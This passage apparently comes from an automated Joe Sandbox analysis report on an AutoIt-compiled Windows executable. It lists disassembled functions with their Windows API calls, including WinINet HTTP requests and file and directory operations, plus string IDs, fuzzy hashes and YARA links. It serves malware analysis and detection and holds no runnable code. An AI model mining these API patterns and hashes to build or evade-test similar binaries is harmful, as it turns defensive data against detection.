                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharLower
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 707087890-567219261
                                                      • Opcode ID: 0a9ac5a8ef882e303368519a93bcefcfeb79a779ec3c080b9c83c1f66e61ad39
                                                      • Instruction ID: 830bd7417a12955201107c8f50963eef7d9a3d1d197141866dd2a2b83aaf6b0b
                                                      • Opcode Fuzzy Hash: 0a9ac5a8ef882e303368519a93bcefcfeb79a779ec3c080b9c83c1f66e61ad39
                                                      • Instruction Fuzzy Hash: AC518031A041169BCB14DF68CE519FFB7A9AF64328B21622AE966F73C4DB31DD40C790
                                                      Function 00EB372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32 ref: 00EB3774
                                                      • CoUninitialize.OLE32 ref: 00EB377F
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00ECFB78,?), ref: 00EB37D9
                                                      • IIDFromString.OLE32(?,?), ref: 00EB384C
                                                      • VariantInit.OLEAUT32(?), ref: 00EB38E4
                                                      • VariantClear.OLEAUT32(?), ref: 00EB3936
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 636576611-1287834457
                                                      • Opcode ID: ad3a18c06cb1443334f8190b03a8f46749e1bd4e5428df8c7115d4adfde04a63
                                                      • Instruction ID: d6b08d66435bd8d9c24c65e791f595b0600f398546879e353703dca22249e358
                                                      • Opcode Fuzzy Hash: ad3a18c06cb1443334f8190b03a8f46749e1bd4e5428df8c7115d4adfde04a63
                                                      • Instruction Fuzzy Hash: DE61B171608311AFD314DF64C84AFABBBE4AF44714F10581AF585B7291D770EE49CB92
                                                      Function 00EA3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EA33CF
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EA33F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-3080491070
                                                      • Opcode ID: afe17a9e5e43ded3e5e51175ab8833f0d3d3a0f3bf065d1e25d41539ef07b368
                                                      • Instruction ID: f79998c2dec186e580278895ec6b86d24d25bba3c80f0275135d9346d7b4ec76
                                                      • Opcode Fuzzy Hash: afe17a9e5e43ded3e5e51175ab8833f0d3d3a0f3bf065d1e25d41539ef07b368
                                                      • Instruction Fuzzy Hash: 3B518F71D00209ABDF15EBA0CD4AEEEBBB9BF09340F206165F51572062EB752F58DB60
                                                      Function 00E9B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 1256254125-769500911
                                                      • Opcode ID: 45484e0018fb645dc678c38ff34ba6c81ca80b0441fcd406bbd4a8ebe1da7968
                                                      • Instruction ID: 651120aad14c86093001a2b91e3763037e1d09730a67341c088d83fe2052fe1d
                                                      • Opcode Fuzzy Hash: 45484e0018fb645dc678c38ff34ba6c81ca80b0441fcd406bbd4a8ebe1da7968
                                                      • Instruction Fuzzy Hash: AB41FD32A001279BCF106F7DDE915BE77A5AFA075CB24622AE421F7285E731DD81C790
                                                      Function 00EA5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EA53A0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EA5416
                                                      • GetLastError.KERNEL32 ref: 00EA5420
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00EA54A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: c716cf6cecab3700235a91105640e19d05c1632886efcbdf2b321a9af7354095
                                                      • Instruction ID: 3cbd9016dcddf7d3e7836732fd3e8d4b5d1f65b02f59231b3a1dd9e190b85ce3
                                                      • Opcode Fuzzy Hash: c716cf6cecab3700235a91105640e19d05c1632886efcbdf2b321a9af7354095
                                                      • Instruction Fuzzy Hash: 6E31E236A006049FC710DF68C484AADBBB4EF4E309F189065E516FF292D731ED86CB90
                                                      Function 00EC3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateMenu.USER32 ref: 00EC3C79
                                                      • SetMenu.USER32(?,00000000), ref: 00EC3C88
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC3D10
                                                      • IsMenu.USER32(?), ref: 00EC3D24
                                                      • CreatePopupMenu.USER32 ref: 00EC3D2E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC3D5B
                                                      • DrawMenuBar.USER32 ref: 00EC3D63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0$F
                                                      • API String ID: 161812096-3044882817
                                                      • Opcode ID: 6e44beb936add4310f44e8b545e792e1ad85e2cf69a3bc187b92e85413c23eef
                                                      • Instruction ID: bbf02fb9b3244896a24ae4191f38cc473b8e2bd85a8657c179c52dc1fa69eafb
                                                      • Opcode Fuzzy Hash: 6e44beb936add4310f44e8b545e792e1ad85e2cf69a3bc187b92e85413c23eef
                                                      • Instruction Fuzzy Hash: 5D418874A01209AFDB14CF64D944FEABBB5FF49314F14402CF94AA7360D732AA16CB90
                                                      Function 00EC3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EC3A9D
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EC3AA0
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC3AC7
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC3AEA
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EC3B62
                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00EC3BAC
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00EC3BC7
                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00EC3BE2
                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00EC3BF6
                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00EC3C13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      • Opcode ID: a3586945d1d97ee09c663c54a1e9000625d41e558694c45333e78b847fe9a25b
                                                      • Instruction ID: 6241eb5832a30c863cb36564da0f1f1306fab167c909909204802854ca902f67
                                                      • Opcode Fuzzy Hash: a3586945d1d97ee09c663c54a1e9000625d41e558694c45333e78b847fe9a25b
                                                      • Instruction Fuzzy Hash: CC615975900208AFDB10DFA8CD81FEEB7F8AB09704F105199FA15A72A1D771AE46DB60
                                                      Function 00E62C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00E62C94
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E62CA0
                                                      • _free.LIBCMT ref: 00E62CAB
                                                      • _free.LIBCMT ref: 00E62CB6
                                                      • _free.LIBCMT ref: 00E62CC1
                                                      • _free.LIBCMT ref: 00E62CCC
                                                      • _free.LIBCMT ref: 00E62CD7
                                                      • _free.LIBCMT ref: 00E62CE2
                                                      • _free.LIBCMT ref: 00E62CED
                                                      • _free.LIBCMT ref: 00E62CFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c1bdeb1e494c96b97ff8640e4779527a8e7913d3c73c0c9633601209baf44b82
                                                      • Instruction ID: a007ef78b41c1b222920f5e75c5ff75d582289020504bebb76d33319c8a8d582
                                                      • Opcode Fuzzy Hash: c1bdeb1e494c96b97ff8640e4779527a8e7913d3c73c0c9633601209baf44b82
                                                      • Instruction Fuzzy Hash: 0B11A776640508BFCB06EF54E842CDD3BA5FF853D0F4154A9FA486F222D631EE509B90
                                                      Function 00E31410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E31459
                                                      • OleUninitialize.OLE32(?,00000000), ref: 00E314F8
                                                      • UnregisterHotKey.USER32(?), ref: 00E316DD
                                                      • DestroyWindow.USER32(?), ref: 00E724B9
                                                      • FreeLibrary.KERNEL32(?), ref: 00E7251E
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E7254B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: d47bd2f7869e669f4cdefd7efe1b9104f0358ce798be5f1384e864195316092e
                                                      • Instruction ID: f78ceddea90d62b9530ca8ebf2e522ece7fc85e3bf420f272c4aa561c7e33ba1
                                                      • Opcode Fuzzy Hash: d47bd2f7869e669f4cdefd7efe1b9104f0358ce798be5f1384e864195316092e
                                                      • Instruction Fuzzy Hash: 1CD18C31701212CFCB29EF55C499B69FBA0BF45704F24A2ADE54A7B262CB31AD12CF51
                                                      Function 00EA7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA7FAD
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA7FC1
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00EA7FEB
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EA8005
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8017
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8060
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA80B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile
                                                      • String ID: *.*
                                                      • API String ID: 769691225-438819550
                                                      • Opcode ID: 106c38aa1b854ad0a1531186832bf569677067d6af95e94cd0c3e70df1a0a312
                                                      • Instruction ID: d3573ce5e0c2fe88ac22df00b0a1cfbd9f73a522bf05286a8fa64f59c3aad83c
                                                      • Opcode Fuzzy Hash: 106c38aa1b854ad0a1531186832bf569677067d6af95e94cd0c3e70df1a0a312
                                                      • Instruction Fuzzy Hash: 5A81C3725082419BCB24DF14C8849AAB7D8BF8A314F14AC5EF8C5EB251EB35ED49CB52
                                                      Function 00E35BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00E35C7A
                                                        • Part of subcall function 00E35D0A: GetClientRect.USER32(?,?), ref: 00E35D30
                                                        • Part of subcall function 00E35D0A: GetWindowRect.USER32(?,?), ref: 00E35D71
                                                        • Part of subcall function 00E35D0A: ScreenToClient.USER32(?,?), ref: 00E35D99
                                                      • GetDC.USER32 ref: 00E746F5
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E74708
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E74716
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E7472B
                                                      • ReleaseDC.USER32(?,00000000), ref: 00E74733
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E747C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 9206e9100949536817abbd65a4e65f0a4bf570cf4d9c4517ad22322710f3ecb4
                                                      • Instruction ID: 1268cad5362376fdda343b0145a5192bdd87eebe9d4462d073250ab8eb6ed46c
                                                      • Opcode Fuzzy Hash: 9206e9100949536817abbd65a4e65f0a4bf570cf4d9c4517ad22322710f3ecb4
                                                      • Instruction Fuzzy Hash: DB71D171500205DFCF258F64C984AFA7BB5FF4A318F24A26AE9597A2A6C331D841DF50
                                                      Function 00EA359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00EA35E4
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • LoadStringW.USER32(00F02390,?,00000FFF,?), ref: 00EA360A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-2391861430
                                                      • Opcode ID: 30fc03f7868abcb2f79553a19000c3c116da1d0605b93797cd408b1e05d77299
                                                      • Instruction ID: ce4cff4640b64f5e3b631e2eb58280ed57252f27a1aa2e24b09a06be9af661e4
                                                      • Opcode Fuzzy Hash: 30fc03f7868abcb2f79553a19000c3c116da1d0605b93797cd408b1e05d77299
                                                      • Instruction Fuzzy Hash: 98516D71800209BBDF15EBA0DC46EEEBBB8FF45304F146125F115761A2EB712A99DFA0
                                                      Function 00EC8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                        • Part of subcall function 00E4912D: GetCursorPos.USER32(?), ref: 00E49141
                                                        • Part of subcall function 00E4912D: ScreenToClient.USER32(00000000,?), ref: 00E4915E
                                                        • Part of subcall function 00E4912D: GetAsyncKeyState.USER32(00000001), ref: 00E49183
                                                        • Part of subcall function 00E4912D: GetAsyncKeyState.USER32(00000002), ref: 00E4919D
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00EC8B6B
                                                      • ImageList_EndDrag.COMCTL32 ref: 00EC8B71
                                                      • ReleaseCapture.USER32 ref: 00EC8B77
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00EC8C12
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EC8C25
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00EC8CFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: fb714edad986a67540b4c82b08e3d7dd1ef5e127351870b2e58638b79a3613e9
                                                      • Instruction ID: 1da682bb545f6cb6ad30bc0b54ba4bef7edaef291120d97299fd3c940d4cafa4
                                                      • Opcode Fuzzy Hash: fb714edad986a67540b4c82b08e3d7dd1ef5e127351870b2e58638b79a3613e9
                                                      • Instruction Fuzzy Hash: 1051AA71204304AFD704DF10DA9AFAABBE4FB88714F10162DF996672E2CB719945CB62
                                                      Function 00EAC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EAC272
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EAC29A
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EAC2CA
                                                      • GetLastError.KERNEL32 ref: 00EAC322
                                                      • SetEvent.KERNEL32(?), ref: 00EAC336
                                                      • InternetCloseHandle.WININET(00000000), ref: 00EAC341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: 90d28f5f06d068a3ca66614304a3f8286905cea54a0a9e5e4ed9c199c20701fa
                                                      • Instruction ID: 8b1259a6b7b66d661a3eca0f8804dc27ab822c4442a6e410af1470791f98f36c
                                                      • Opcode Fuzzy Hash: 90d28f5f06d068a3ca66614304a3f8286905cea54a0a9e5e4ed9c199c20701fa
                                                      • Instruction Fuzzy Hash: 03318471500604AFDB219F658C84AAB7AFCEB4E744F20951EF44AB6210D731ED099B60
                                                      Function 00E9989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E73AAF,?,?,Bad directive syntax error,00ECCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E998BC
                                                      • LoadStringW.USER32(00000000,?,00E73AAF,?), ref: 00E998C3
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
